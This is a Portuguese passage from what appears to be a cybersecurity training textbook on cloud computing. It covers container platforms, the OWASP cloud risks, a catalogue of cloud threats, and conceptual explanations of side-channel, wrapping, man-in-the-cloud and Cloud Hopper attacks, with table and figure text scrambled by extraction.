Os invasores podem explorar contêineres com falha com soquetes brutos ativos e conexões de rede de saída para
lançar vários ataques baseados em rede.
ÿ Ignorando o isolamento
Os invasores, após comprometer a segurança de um contêiner, podem aumentar os privilégios para obter acesso
a outros contêineres ou ao próprio host.
ÿ Complexidade do ecossistema
Os contêineres são criados, implantados e gerenciados usando vários fornecedores e fontes. Isso torna complexo
proteger e atualizar os componentes individuais porque eles se originam de diferentes repositórios.

Plataformas de gerenciamento de contêineres

Uma plataforma de contêiner que ajuda a criar, gerenciar e Amazon Elastic Container
Docker
proteger todos os aplicativos e implantá-los em ambientes de nuvem Service (ECS) https://
aws.amazon.com
Instâncias de contêiner do
Microsoft Azure (ACI) https://
azure.microsoft.com
Red Hat OpenShift Container

Platform https:// www.openshift.com
Portainer
https:// www.portainer.io
Plataforma de contêineres
HPE Ezmeral https://
www.hpe.com
https:// www.docker.com
Plataformas de gerenciamento de contêineres
Listadas abaixo estão várias plataformas de gerenciamento de contêineres:
ÿ Docker
Fonte: https:// www.docker.com
O Docker é uma plataforma de contêiner independente que ajuda a criar, gerenciar e proteger todos os
aplicativos, desde aplicativos tradicionais até os microsserviços mais recentes, e implantá-los em ambientes
de nuvem. O Docker contém a mais recente biblioteca de conteúdo de contêiner e ecossistema com mais
de 100.000 imagens de contêiner, que permitem aos desenvolvedores criar e implantar aplicativos. O
Docker também apresenta blocos de construção principais, como Docker Desktop, Docker Engine e Docker
Hub, para compartilhar e gerenciar facilmente as pilhas de aplicativos.

Figura 11.22: captura de tela do Docker
As plataformas adicionais de gerenciamento de contêineres incluem o seguinte:
ÿ Amazon Elastic Container Service (ECS) (https:// aws.amazon.com)
ÿ Microsoft Azure Container Instances (ACI) (https:// azure.microsoft.com)
ÿ Red Hat OpenShift Container Platform (https:// www.openshift.com)
ÿ Portainer (https:// www.portainer.io)
ÿ Plataforma de contêiner HPE Ezmeral (https:// www.hpe.com)

Plataformas Kubernetes
Kubernetes Um mecanismo de orquestração de contêineres de código aberto para automatizar a implantação,

dimensionamento e gerenciamento de aplicativos em contêineres
Amazon Elastic Kubernetes

Service (EKS) https://
aws.amazon.com
Serviço Docker Kubernetes (DKS)

https:// www.docker.com
Knative
https:// cloud.google.com
Serviço IBM Cloud Kubernetes

https:// www.ibm.com
Google Kubernetes Engine (GKE)

https:// cloud.google.com
https:// kubernetes.io
Plataformas Kubernetes
Listadas abaixo estão várias plataformas do Kubernetes:
ÿ Kubernetes
Fonte: https:// kubernetes.io
O Kubernetes é um mecanismo de orquestração de contêineres de código aberto para automatizar a

implantação, dimensionamento e gerenciamento de aplicativos em contêineres. Ele também agrupa
diferentes contêineres que compõem um aplicativo em várias unidades lógicas para facilitar o gerenciamento
e a descoberta. Ele permite que os usuários aproveitem a infraestrutura local, híbrida ou em nuvem para
migrar cargas de trabalho de um local para outro. O Kubernetes também pode implantar e atualizar segredos
e configurações de aplicativos sem reconstruir as imagens do contêiner e sem expor segredos na
configuração da pilha.

Figura 11.23: captura de tela do Kubernetes
As plataformas adicionais do Kubernetes incluem o seguinte:
ÿ Amazon Elastic Kubernetes Service (EKS) (https:// aws.amazon.com)
ÿ Docker Kubernetes Service (DKS) (https:// www.docker.com)
ÿ Knative (https:// cloud.google.com)
ÿ Serviço IBM Cloud Kubernetes (https:// www.ibm.com)
ÿ Google Kubernetes Engine (GKE) (https:// cloud.google.com)

Fluxo do módulo

01 02 Tecnologia

Contramedidas
04 03
Discutir ameaças de computação em nuvem

A maioria das organizações adota a tecnologia de nuvem porque reduz o custo por meio de computação
otimizada e eficiente. A robusta tecnologia de nuvem oferece diferentes tipos de serviços aos usuários finais;
no entanto, muitas pessoas estão preocupadas com os riscos e ameaças críticas de segurança na nuvem,
que os invasores podem aproveitar para comprometer a segurança dos dados, obter acesso ilegal a redes
etc. Esta seção trata dos riscos e ameaças de segurança significativos que afetam os sistemas de nuvem.

As 10 principais nuvens da OWASP

Riscos de segurança
riscos Descrição
R1 - Responsabilidade e • Usar a nuvem pública para hospedar serviços de negócios pode

Propriedade de dados causar sérios riscos para a capacidade de recuperação dos dados
• Criação de várias identidades de usuário para diferentes nuvens

R2 - Identidade do Usuário
provedores torna complexo o gerenciamento de vários usuários
Federação
IDs e credenciais
R3 - Regulatório • Há falta de transparência e há

Observância diferentes leis regulatórias em diferentes países
• Pode haver risco de negócios ou perda monetária se o provedor

R4 - Continuidade de
de nuvem lidar com a continuidade dos negócios de maneira
Negócios e Resiliência
inadequada
R5 - Privacidade do usuário e • O recurso de compartilhamento padrão em sites sociais pode

Uso secundário de dados comprometer a privacidade dos dados pessoais do usuário
OWASP Top 10 Cloud Security

Riscos (continuação)
riscos Descrição
R6 - Serviço e Dados • Dados não seguros em trânsito são suscetíveis a ataques de espionagem
Integração e interceptação
R7 - Multilocação e • A segregação lógica deficiente pode levar os inquilinos a interferir nos

Segurança física recursos de segurança de outros inquilinos
• Devido ao armazenamento distribuído de logs na nuvem, as agências de

R8 - Análise de Incidência e
aplicação da lei podem enfrentar problemas forenses
Suporte Forense
recuperação
• A configuração incorreta da infraestrutura pode permitir a varredura

R9 - Segurança de Infraestrutura
de rede em busca de aplicativos e serviços vulneráveis
• O uso de ambientes de não produção aumenta o risco de acesso não

R10 - Não Produção
autorizado, divulgação de informações e modificação de informações
Exposição Ambiental
Os 10 principais riscos de segurança na nuvem da OWASP
A tabela abaixo resume os 10 principais riscos de segurança na nuvem, de acordo com a OWASP.

riscos Descrição
ÿ As organizações usam a nuvem pública para hospedar serviços de negócios

em vez de um centro de dados tradicional.
ÿ Às vezes, o uso da nuvem causa a perda de responsabilidade e controle dos dados,

R1 - Responsabilidade e
enquanto o uso de um data center tradicional ajuda a controlar e proteger os dados lógica
Propriedade de dados
e fisicamente. ÿ O uso da nuvem pública pode comprometer a capacidade de recuperação
de dados e resultar em riscos críticos, que a organização precisa mitigar prontamente.
ÿ As empresas usam serviços e aplicativos de diferentes nuvens

provedores, criando várias identidades de usuário e complicando o gerenciamento de
R2 - Identidade do Usuário
vários IDs e credenciais de usuário.
Federação
ÿ Os provedores de nuvem têm menos controle sobre o ciclo de vida do usuário
/desembarque.
ÿ Seguir a conformidade regulamentar pode ser complexo. ÿ Os dados
R3 - Regulatório protegidos em um país podem não estar protegidos em outro devido à falta de transparência e
Observância às diferentes leis regulatórias seguidas em vários países.
ÿ Executar a continuidade dos negócios em uma organização de TI garante que os negócios

possam ser conduzidos em uma situação de desastre.
R4 - Continuidade de Negócios
ÿ Quando as organizações usam serviços de nuvem, há uma chance de risco ou perda
e Resiliência
monetária se o provedor de nuvem lidar com a continuidade dos negócios de maneira
inadequada.
ÿ O uso de sites sociais representa um risco para os dados pessoais porque eles são
armazenados na nuvem e a maioria dos provedores de aplicativos sociais extrai dados do
R5 - Privacidade do usuário e
usuário para uso secundário.
Uso secundário de dados
ÿ O recurso de compartilhamento padrão em sites de redes sociais pode comprometer
a privacidade dos dados pessoais do usuário.
ÿ As organizações devem garantir a proteção adequada quando os dados proprietários são

R6 - Serviço e Dados transferidos do usuário final para o data center na nuvem.
Integração ÿ Dados não seguros em trânsito são suscetíveis a espionagem e

ataques de interceptação.
ÿ A tecnologia de nuvem usa o conceito de multilocação para compartilhamento

recursos e serviços entre vários clientes, como redes, bancos de dados.
R7 - Multilocação e
Segurança física
ÿ A segregação lógica inadequada pode fazer com que os inquilinos interfiram nos recursos de
segurança uns dos outros.
ÿ Quando ocorre um incidente de segurança, investigar aplicativos e serviços hospedados

em um provedor de nuvem pode ser um desafio porque os logs de eventos são
R8 - Análise de Incidência e
distribuídos em vários hosts e data centers localizados em vários países e regidos por
Suporte Forense
diferentes leis e políticas.

ÿ Devido ao armazenamento distribuído de logs na nuvem, as agências de aplicação

da lei podem enfrentar problemas na recuperação forense.
ÿ As linhas de base de configuração da infraestrutura devem estar em conformidade com as

melhores práticas do setor, pois há risco constante de ações maliciosas.
R9 - Infraestrutura
Segurança ÿ A configuração incorreta da infraestrutura pode permitir a varredura de rede para
aplicativos e serviços vulneráveis para recuperar informações, como portas ativas não
utilizadas e senhas e configurações padrão.
ÿ Ambientes de não produção são usados para design de aplicativos e

desenvolvimento e testar atividades internamente dentro de uma organização.
R10 - Não Produção
ÿ O uso de ambientes de não produção aumenta o risco de
Exposição Ambiental
acesso não autorizado, divulgação de informações e modificação de informações.
Tabela 11.2: Os 10 principais riscos de segurança em nuvem da OWASP

Ameaças de computação em nuvem
01 Violação/perda de dados 06 Perfil de risco desconhecido 11 Internos maliciosos 16 Falha de hardware
Abuso e Nefasto Relógios do sistema Acesso ilegal a Falha na cadeia de

02 Uso de serviços em nuvem
07 12 17 suprimentos
não sincronizados sistemas em nuvem
Projeto e Perda de reputação

Interfaces inseguras e Modificando
03 08 planejamento de 13 comercial devido a 18
APIs o tráfego de rede
infraestrutura inadequados atividades de co-inquilino
Conflitos entre cliente

devido insuficiente
04 09 procedimentos de proteção e 14 Escalação de privilégio 19 Falha de isolamento
diligência
ambiente de nuvem
Problemas de tecnologia Perda de logs operacionais Aquisição de

05 compartilhada
10 15 Desastres naturais 20
e de segurança provedor de nuvem
Ameaças de computação em nuvem (continuação)
Comprometimento da interface roubo de equipamentos

21 26 Riscos de licenciamento 31 36 riscos de conformidade
de gerenciamento de informática
Negação econômica
Falha de gerenciamento de Encerramento ou
22 rede
27 Perda de governança 32 falha do serviço de nuvem
37 da sustentabilidade
(EDOS)
Perda de chaves de Intimação e descoberta Falta de segurança

23 Ataques de autenticação 28 33 38 Arquitetura
criptografia
Riscos de mudanças de Manuseio e descarte inadequado

24 Ataques no nível da VM 29 Jurisdição
34 39 Sequestro de contas
de dados
Realizar sondagens ou Perda ou modificação de

25 aprisionamento
30 35
varreduras maliciosas dados de backup
Ameaças de computação em nuvem
Discutidas abaixo estão algumas ameaças à computação em nuvem:
ÿ Violação/Perda de Dados
Um ambiente de computação em nuvem projetado incorretamente com vários clientes corre alto risco de violação
de dados porque uma falha no aplicativo de um cliente pode permitir que os invasores

acessar dados de outros clientes. A perda ou vazamento de dados é altamente dependente da arquitetura e operação da
nuvem.
Os problemas de perda de dados incluem o seguinte:
o Os dados são apagados, modificados ou desacoplados (perdidos).
o As chaves de criptografia são perdidas, extraviadas ou roubadas.
o Os dados são acessados ilegalmente devido a autenticação, autorização e

controles de acesso.
o Os dados são mal utilizados pelo CSP.
ÿ Abuso e Uso Nefasto de Serviços Cloud
A presença de sistemas de registro fracos no ambiente de computação em nuvem pode permitir que invasores criem acesso
anônimo a serviços em nuvem e perpetrem vários ataques, como quebra de senha e crítica, construção de tabelas arco-íris,
fazendas de resolução CAPTCHA, lançamento de pontos de ataque dinâmicos, hospedagem de explorações em plataformas
de nuvem, hospedagem de dados maliciosos, comando ou controle de Botnet e DDoS.
ÿ Interfaces e APIs inseguras
Interfaces ou APIs permitem que os clientes gerenciem e interajam com serviços em nuvem. Os modelos de serviço em nuvem
devem ter segurança integrada e os usuários devem estar cientes dos riscos de segurança no uso, implementação e
monitoramento de tais serviços. Interfaces inseguras e riscos de APIs incluem o seguinte:
o Contorna as políticas definidas pelo usuário
o Não credencial à prova de vazamento
o Violação nas instalações de registro e monitoramento
o Dependências de API desconhecidas
o Senhas/tokens reutilizáveis
o Validação insuficiente de dados de entrada
ÿ Devida Diligência Insuficiente
A ignorância do ambiente de nuvem do CSP apresenta riscos em responsabilidades operacionais, como segurança, criptografia,
resposta a incidentes e mais problemas como questões contratuais, design e arquitetura.
ÿ Problemas de Tecnologia Compartilhada
Os fornecedores de IaaS compartilham a infraestrutura para fornecer serviços de maneira escalável. A maioria dos componentes
de infraestrutura subjacentes (por exemplo, GPU, caches de CPU) não oferece propriedades de isolamento substanciais em
um ambiente multilocatário. Isso permite que os invasores ataquem outras máquinas se puderem explorar vulnerabilidades nos
aplicativos de um cliente. Para resolver essa lacuna, os hipervisores de virtualização mediam o acesso entre os sistemas
operacionais convidados e o físico

recursos que podem conter brechas que permitem que hackers obtenham controle não autorizado sobre as
plataformas subjacentes.
ÿ Perfil de Risco Desconhecido
Atualizações de software, análise de ameaças, detecção de invasões, práticas de segurança e vários outros
componentes determinam a postura de segurança de uma organização. As organizações clientes não
conseguem obter uma imagem clara dos procedimentos internos de segurança, conformidade de segurança,
proteção de configuração, aplicação de patches, auditoria e registro, etc. porque estão menos envolvidas
com propriedade e manutenção de hardware e software na nuvem.
No entanto, as organizações devem estar cientes de questões como procedimentos de segurança interna,
conformidade de segurança, proteção de configuração, aplicação de patches e auditoria e registro.
ÿ Relógios do sistema não sincronizados
A falha de sincronização de relógios nos sistemas finais pode afetar o funcionamento de tarefas
automatizadas. Por exemplo, se os dispositivos de computação em nuvem não tiverem horários sincronizados
ou combinados, a imprecisão do registro de data e hora torna o administrador da rede incapaz de analisar
os arquivos de log em busca de qualquer atividade maliciosa com precisão. Relógios não sincronizados
podem causar vários outros problemas; por exemplo, no caso de transações de dinheiro ou backups de
banco de dados, o timestamp incompatível pode resultar em problemas ou discrepâncias significativas.
ÿ Desenho e Planeamento de Infraestruturas Inadequadas
Um acordo entre o CSP e o cliente estabelece a qualidade do serviço que o CSP oferece, como tempo de
inatividade, redundâncias físicas e baseadas em rede, processos padrão de backup e restauração de dados
e períodos de disponibilidade.
Às vezes, os CSPs podem não atender ao rápido aumento da demanda devido à escassez de recursos de
computação e/ou projeto de rede ruim (por exemplo, o tráfego flui por um único ponto, mesmo que o
hardware necessário esteja disponível), dando origem a uma latência de rede inaceitável ou incapacidade
de atender aos níveis de serviço acordados.
ÿ Conflitos entre Procedimentos de Endurecimento do Cliente e Ambiente de Nuvem
Certos procedimentos de proteção do cliente podem entrar em conflito com um ambiente CSP,
impossibilitando a implementação pelo cliente. Como uma nuvem é um ambiente multilocatário, a colocação
de muitos clientes realmente causa conflitos para os provedores de nuvem, pois os requisitos de segurança
de comunicação provavelmente divergem entre os clientes.
ÿ Perda de Logs Operacionais e de Segurança
A perda de logs operacionais dificulta a avaliação das variáveis operacionais. As opções para resolver
problemas são limitadas quando não há dados disponíveis para análise. A perda de logs de segurança
representa um risco para o gerenciamento da implementação do programa de gerenciamento de segurança
da informação. A perda de logs de segurança pode ocorrer em caso de armazenamento sob provisionamento.

ÿ Insiders maliciosos
Insiders mal-intencionados são atuais/ex-funcionários, contratados ou outros parceiros de negócios

descontentes que têm/tiveram acesso autorizado a recursos de nuvem e podem intencionalmente exceder
ou usar indevidamente esse acesso para comprometer a confidencialidade, integridade ou disponibilidade
das informações da organização. Insiders mal-intencionados que têm acesso autorizado aos recursos da
nuvem podem abusar de seu acesso para comprometer as informações disponíveis na nuvem. As ameaças
incluem perda de reputação, produtividade e roubo financeiro.
ÿ Acesso Ilegal à Nuvem
Controles fracos de autenticação e autorização podem levar a acesso ilegal, comprometendo dados
confidenciais e críticos armazenados na nuvem.
ÿ Perda de Reputação Comercial devido a Actividades de Co-inquilinos
Essa ameaça surge devido à falta de isolamento de recursos e reputação, vulnerabilidades nos hipervisores
etc. perda de dados, etc. que prejudicam a reputação da organização.
ÿ Escalonamento de Privilégios
Erros no sistema de alocação de acesso, como erros de codificação e falhas de projeto, podem fazer com
que um cliente, terceiro ou funcionário obtenha mais direitos de acesso do que o necessário. Essa ameaça
surge devido a vulnerabilidades de autenticação, autorização e responsabilidade, vulnerabilidades de
provisionamento e desprovisionamento de usuários, vulnerabilidades de hipervisor, funções e
responsabilidades pouco claras, configuração incorreta, etc.
ÿ Desastres Naturais
Com base na localização geográfica e no clima, os data centers podem estar expostos a desastres naturais,
como inundações, raios e terremotos, que podem afetar os serviços em nuvem.
ÿ Falha de Hardware
Falhas de hardware, como switches, servidores, roteadores, pontos de acesso, discos rígidos, placas de
rede e processadores em data centers, podem tornar os dados da nuvem inacessíveis. A maioria das falhas
de hardware ocorre devido a problemas no disco rígido. As falhas no disco rígido levam muito tempo para
rastrear e corrigir devido às suas complexidades de baixo nível. A falha de hardware pode levar a uma
entrega de desempenho insatisfatória aos usuários finais e prejudicar os negócios.
ÿ Falha na Cadeia de Suprimentos
Uma falha na cadeia de suprimentos pode ser causada por termos de uso incompletos e não transparentes,
dependências ocultas criadas por aplicativos cross-cloud, seleção inadequada de CSP, falta de redundância
do fornecedor, etc. Os provedores de nuvem terceirizam certas tarefas para terceiros. Assim, a segurança
da nuvem é diretamente proporcional à segurança de cada link e ao grau de dependência de terceiros.
Uma interrupção na cadeia pode levar a

perda de privacidade e integridade de dados, indisponibilidade de serviços, violação do SLA, perdas econômicas
e de reputação por não atender à demanda do cliente e falha em cascata.
ÿ Modificando o Tráfego de Rede
Na nuvem, o tráfego de rede pode ser alterado devido a falhas durante o provisionamento ou desprovisionamento
de redes ou vulnerabilidades na criptografia de comunicação. A modificação do tráfego de rede pode causar
perda, alteração ou roubo de dados e comunicações confidenciais.
ÿ Falha de Isolamento
Multilocação e recursos compartilhados são as características da computação em nuvem. Falta forte isolamento
ou compartimentalização de armazenamento, memória, roteamento e reputação entre diferentes inquilinos.
Devido à falha de isolamento, os invasores tentam controlar as operações de outros clientes da nuvem para obter
acesso ilegal aos dados.
ÿ Aquisição de Provedor Cloud
A aquisição do CSP pode aumentar a probabilidade de mudança tática e afetar acordos não vinculativos em risco.
Isso pode representar um desafio no tratamento dos requisitos de segurança.
ÿ Comprometimento da Interface de Gerenciamento
As interfaces de gerenciamento de clientes dos provedores de nuvem facilitam o acesso a um grande número de
recursos pela Internet. Isso aumenta os riscos de segurança, especialmente quando combinado com acesso
remoto e vulnerabilidades do navegador da web. O comprometimento da interface de gerenciamento surge de
configuração inadequada, vulnerabilidades do sistema e do aplicativo, acesso remoto à interface de gerenciamento,
etc.
ÿ Falha na Gestão da Rede
O gerenciamento de rede inadequado leva ao congestionamento da rede, conexão incorreta, configuração

incorreta, falta de isolamento de recursos, etc., que afetam os serviços e a segurança.
ÿ Ataques de Autenticação
Mecanismos de autenticação fracos (senhas fracas, reutilização de senha, etc.) e as limitações inerentes dos
mecanismos de autenticação de um fator permitem que invasores obtenham acesso não autorizado a sistemas
de computação em nuvem.
ÿ Ataques em nível de VM
A computação em nuvem usa extensivamente tecnologias de virtualização oferecidas por vários fornecedores,
incluindo VMware, Xen, Virtual Box e vSphere. Ameaças a essas tecnologias surgem de vulnerabilidades nos
hipervisores.
ÿ Bloqueio
Lock-in reflete a incapacidade do cliente de migrar de um CSP para outro ou sistemas internos devido à falta de
ferramentas, procedimentos, formatos de dados padrão, aplicativos e portabilidade de serviço. Essa ameaça está
relacionada à seleção inadequada de um CSP, termos de uso incompletos e não transparentes, falta de
mecanismos padrão etc.

ÿ Riscos de Licenciamento
A organização pode incorrer em uma taxa de licenciamento substancial se o CSP cobrar o software implantado
na nuvem por instância. Portanto, a organização deve sempre manter a propriedade sobre seus ativos de
software localizados no ambiente do provedor de nuvem.
Os riscos de licenciamento ocorrem devido a termos de uso incompletos e não transparentes.
ÿ Perda de Governação
Ao usar a infraestrutura de nuvem, os clientes concedem controle aos CSPs em relação a problemas que
podem afetar a segurança. Além disso, os SLAs podem não obrigar o CSP a fornecer tais serviços, deixando
assim uma lacuna nas defesas de segurança. Essa ameaça resulta da falta de clareza de papéis e
responsabilidades, falta de processos de avaliação de vulnerabilidade, promessas conflitantes em SLAs, falta
de esquemas de certificação e jurisdição e indisponibilidade da auditoria, entre outros.
A perda de governança resulta em não conformidade com requisitos de segurança, falta de confidencialidade,
integridade e disponibilidade de dados, baixo desempenho e qualidade de serviço, etc.
ÿ Perda de Chaves de Criptografia
A perda de chaves de criptografia necessárias para comunicação segura ou acesso a sistemas oferece aos
invasores em potencial a possibilidade de obter ativos não autorizados. Essa ameaça surge das técnicas
inadequadas de gerenciamento e geração de chaves.
ÿ Riscos de Mudanças de Jurisdição
As nuvens podem armazenar os dados do cliente em várias jurisdições, algumas das quais podem ser de alto
risco. As autoridades locais em países de alto risco (por exemplo, países sem o estado de direito, com uma
estrutura legal e fiscalização imprevisíveis ou estados policiais autocráticos) podem invadir data centers; os
dados ou o sistema de informação podem ser sujeitos a divulgação forçada ou apreensão. Mudanças na
jurisdição dos dados podem levar ao bloqueio ou apreensão do sistema de informação pelo governo ou outras
organizações.
Os clientes devem considerar as ambiguidades jurisdicionais antes de adotar uma nuvem, pois as leis locais
para armazenamento de dados podem fornecer acesso do governo a dados privados.
ÿ Realização de sondagens ou varreduras maliciosas
Sondagens ou varreduras maliciosas permitem que invasores coletem informações confidenciais que podem
levar à perda de confidencialidade e integridade e disponibilidade de serviços e dados.
ÿ Roubo de Equipamento Informático
O roubo de equipamentos pode ocorrer devido a controles inadequados de parâmetros físicos, como acesso
por smart card na entrada, o que pode levar à perda de equipamentos físicos e dados sensíveis.
ÿ Rescisão ou Falha do Serviço Cloud
A rescisão do serviço de nuvem por falta de lucratividade ou disputas pode levar à perda de dados, a menos
que os usuários finais se protejam legalmente. Muitos fatores, como competitividade

pressão, falta de suporte financeiro e estratégias de negócios inadequadas podem levar ao encerramento ou
falha do serviço em nuvem. Essa ameaça resulta em entrega e qualidade de serviço insatisfatórias e perda de
investimento. Além disso, falhas nos serviços terceirizados para o CSP podem afetar sua capacidade de cumprir
deveres e compromissos com seus clientes.
ÿ Intimação e E-Discovery
Os dados e serviços do cliente estão sujeitos a um pedido de cessação por parte de autoridades ou terceiros.
Essa ameaça ocorre devido ao isolamento inadequado de recursos, armazenamento de dados em várias
jurisdições e falta de conhecimento sobre as jurisdições.
ÿ Manuseio e Descarte Indevido de Dados
É difícil determinar os procedimentos de tratamento e descarte de dados seguidos pelos CSPs devido ao acesso
limitado à infraestrutura de nuvem. Quando os clientes solicitam a exclusão de dados, os dados podem não ser
realmente apagados porque
o Múltiplas cópias de dados são armazenadas, mesmo que não estejam disponíveis.
o O disco a ser destruído também pode conter dados de outros clientes.
o A multilocação e a reutilização de recursos de hardware na nuvem mantêm os dados do cliente em risco.
ÿ Perda/Modificação de Dados de Backup
Os invasores podem explorar vulnerabilidades, como injeção de SQL e comportamento inseguro do usuário (por
exemplo, armazenamento ou reutilização de senhas) para obter acesso ilegal aos backups de dados na nuvem.
Depois de obter acesso, os invasores podem excluir ou modificar os dados armazenados nos bancos de dados.
A falta de procedimentos de restauração de dados em caso de perda de dados de backup coloca em risco os
níveis de serviço.
ÿ Riscos de Conformidade
Organizações que buscam obter conformidade com padrões e leis podem estar em risco se o CSP não puder
fornecer evidências de conformidade com os requisitos, terceirizar o gerenciamento de nuvem para terceiros e/
ou não permitir auditoria pelo cliente. Os riscos de conformidade surgem da falta de governança sobre auditorias
e avaliações padrão do setor. Assim, os clientes desconhecem os processos, procedimentos e práticas dos
provedores em relação à acessibilidade, gerenciamento de identidade e segregação de funções.
ÿ Negação Econômica da Sustentabilidade (EDoS)
O método de pagamento em um sistema de nuvem é “Sem uso, sem fatura”; quando os clientes fazem
solicitações, o CSP cobra de acordo com os dados registrados, a duração das solicitações, a quantidade de
dados transferidos na rede e o número de ciclos de CPU consumidos. A negação econômica de serviço destrói
recursos financeiros; na pior das hipóteses, isso pode levar à falência do cliente ou a outro impacto econômico
sério. Se um invasor envolver o servidor em nuvem com um serviço malicioso ou executar um código malicioso
que consuma muito poder computacional e armazenamento, o legítimo titular da conta será cobrado até que a
causa principal do uso da CPU seja detectada.

ÿ Falta de Arquitetura de Segurança
A maioria das empresas está migrando seus recursos de TI para a nuvem pública, portanto, incorporar
estratégias de segurança adequadas para impedir ameaças cibernéticas é um grande desafio. É importante
desenvolver arquiteturas e estratégias de segurança adequadas antes de migrar a infraestrutura de TI para
a nuvem.
ÿ Sequestro de Contas
Uma ameaça altamente crítica para as organizações é o comprometimento das contas dos funcionários na
nuvem. Se um invasor obtiver acesso à nuvem comprometendo uma conta de usuário, ele poderá obter
acesso a todas as informações armazenadas nos servidores da nuvem sem deixar rastros.
Os invasores usam técnicas como phishing e quebra de senha para obter as credenciais do usuário. Esses
ataques impactam severamente as operações de negócios, causando danos à reputação, degradação do
valor da marca, divulgação de informações confidenciais, etc.

Ataques na nuvem: ataques de canal lateral ou violações de VM entre convidados
ÿ O invasor compromete a nuvem colocando uma máquina virtual maliciosa perto de um servidor de nuvem de destino e, em seguida, inicia
um ataque de canal lateral
ÿ Em um ataque de canal lateral, o invasor executa uma máquina virtual no mesmo host físico da máquina virtual da vítima e aproveita os recursos
físicos compartilhados (cache do processador) para roubar dados (chaves criptográficas) da vítima
ÿ Ataques de canal lateral podem ser implementados por qualquer usuário co-residente devido às vulnerabilidades nos recursos de tecnologia compartilhados
Multi inquilino ataque cronometrado

Nuvem
CPU
Cache
Remanência de dados
Do utilizador
VM da vítima
Chaves criptográficas/ Criptoanálise Acústica

O invasor se faz passar Segredos de Texto Simples
pela vítima usando as
credenciais roubadas
do atacante Ataque de monitoramento de energia
VM
Rouba as
credenciais da vítima Análise Diferencial de Falhas
Atacante
Ataques na Nuvem
Discutidos abaixo estão vários métodos de ataque executados no ambiente de computação em nuvem.
Ataques de canal lateral ou violações de VM entre convidados
Os invasores podem comprometer a nuvem colocando uma máquina virtual maliciosa perto de um servidor de
nuvem de destino e, em seguida, lançar um ataque de canal lateral. A figura abaixo mostra como um invasor pode
comprometer a nuvem colocando uma VM maliciosa perto de um servidor de nuvem de destino. O invasor executa
a VM no mesmo host físico da VM de destino e aproveita os recursos físicos compartilhados (cache do processador).
Em seguida, ele lança ataques de canal lateral (ataque de temporização, remanência de dados, criptoanálise
acústica, ataque de monitoramento de energia e análise diferencial de falhas) para extrair chaves criptográficas/
segredos de texto simples para roubar as credenciais da vítima. Os ataques de canal lateral podem ser
implementados por qualquer usuário co-residente e estão principalmente relacionados a vulnerabilidades em
recursos de tecnologia compartilhados. Por fim, o invasor usa as credenciais roubadas para representar a vítima.

Figura 11.24: Exemplo de ataques de canal lateral

Ataques de nuvem: ataque envolvente

Um ataque de empacotamento é executado durante a tradução da mensagem SOAP na camada TLS,
onde os invasores duplicam o corpo da mensagem e a enviam ao servidor como um usuário legítimo
Do utilizador Atacante servidor de nuvem
O usuário envia a solicitação ao servidor da web
Cabeçalho Corpo
Envia uma mensagem SOAP

Intercepta o
com um cabeçalho
mensagem SOAP
Cabeçalho Malicioso
Duplica o documento original, adiciona a + Corpo Corpo
cópia ao cabeçalho e modifica o

documento original Envia o modificado
mensagem SOAP
Ataque envolvente
Um ataque de empacotamento é executado durante a tradução da mensagem SOAP na camada TLS,
onde os invasores duplicam o corpo da mensagem e a enviam ao servidor como um usuário legítimo.
Conforme mostrado na figura abaixo, quando os usuários enviam uma solicitação de sua VM por meio
de um navegador, a solicitação chega primeiro ao servidor da web. Em seguida, uma mensagem SOAP
contendo informações estruturais é gerada e trocada com o navegador durante a passagem da mensagem.
Antes que ocorra a passagem da mensagem, o navegador precisa assinar o documento XML e canonizá-
lo. Além disso, ele deve anexar os valores de assinatura ao documento. Por fim, o cabeçalho SOAP
deve conter as informações necessárias para o destino após a computação.
Em um ataque de envolvimento, a decepção do adversário ocorre durante a tradução da mensagem

SOAP no TLS. O invasor duplica o corpo da mensagem e a envia ao servidor como um usuário legítimo.
O servidor verifica a autenticação através do valor da assinatura (que também está duplicado) e verifica
sua integridade. Como resultado, o adversário pode invadir a nuvem e executar códigos maliciosos para
interromper o funcionamento normal dos servidores na nuvem.

Figura 11.25: Exemplo de um ataque wraping

Ataques na Nuvem: Ataque Man-in-the-Cloud (MITC)
Os ataques MITC são uma versão avançada do Man-in

1 ataques do meio (MITM)
O invasor engana a vítima para instalar um código

2 malicioso, que planta o token de sincronização do
invasor na unidade da vítima
Vítima Atacante
Em seguida, o invasor rouba o token de
3 sincronização da vítima e usa o token roubado para obter
acesso aos arquivos da vítima
Posteriormente, o invasor restaura o token malicioso com o

token sincronizado original da vítima, retornando assim o
4 aplicativo da unidade ao seu estado original e permanece sem
ser detectado
Ataque Man-in-the-Cloud (MITC)

Os ataques MITC são uma versão avançada dos ataques MITM. Nos ataques MITM, um invasor usa
um exploit que intercepta e manipula a comunicação entre duas partes, enquanto os ataques MITC são
realizados abusando de serviços de sincronização de arquivos em nuvem, como Google Drive ou
DropBox, para comprometimento de dados, comando e controle (C&C), exfiltração de dados e acesso
remoto. Os tokens de sincronização são usados para autenticação de aplicativos na nuvem, mas não
podem distinguir o tráfego mal-intencionado do tráfego normal. Os invasores abusam dessa fraqueza
em contas de nuvem para realizar ataques MITC.
Figura 11.26: Exemplo de ataques Man-in-the-Cloud

Conforme mostrado na figura, o invasor engana a vítima para instalar um código malicioso que
planta o token de sincronização do invasor na unidade da vítima. Em seguida, o invasor rouba o
token de sincronização da vítima e o utiliza para obter acesso aos arquivos da vítima. Posteriormente,
o invasor restaura o token malicioso com o token sincronizado original da vítima, retornando o
aplicativo Drive ao seu estado original e permanecendo indetectável.

Ataques na Nuvem: Ataque Cloud Hopper

Os ataques do Cloud Hopper são acionados nos provedores de serviços gerenciados (MSPs) e seus usuários
Os invasores iniciam e-mails de spear phishing com malware personalizado para comprometer as contas de funcionários ou
empresas de serviços em nuvem para obter informações confidenciais
Usuários MSP
MSP
Fornecedor
Infiltrar MSPs e distribuir
malware para acesso remoto
Usuários MSP
Atacante extrai dados do cliente

informações do MPS
Atacante
Vítima - Usuário MSP
Ataque Cloud Hopper
Os ataques de hopper na nuvem são acionados em provedores de serviços gerenciados (MSPs) e seus clientes.
Depois que o ataque é implementado com sucesso, os invasores podem obter acesso remoto à propriedade
intelectual e informações críticas do MSP de destino e seus usuários/clientes globais.
Os invasores também se movem lateralmente na rede de um sistema para outro no ambiente de nuvem para
obter mais acesso a dados confidenciais pertencentes às entidades industriais, como manufatura, órgãos
governamentais, saúde e finanças.
Os invasores iniciam e-mails de spear phishing com malware personalizado para comprometer contas de
usuários de membros da equipe ou empresas de serviços em nuvem para obter informações confidenciais. Os
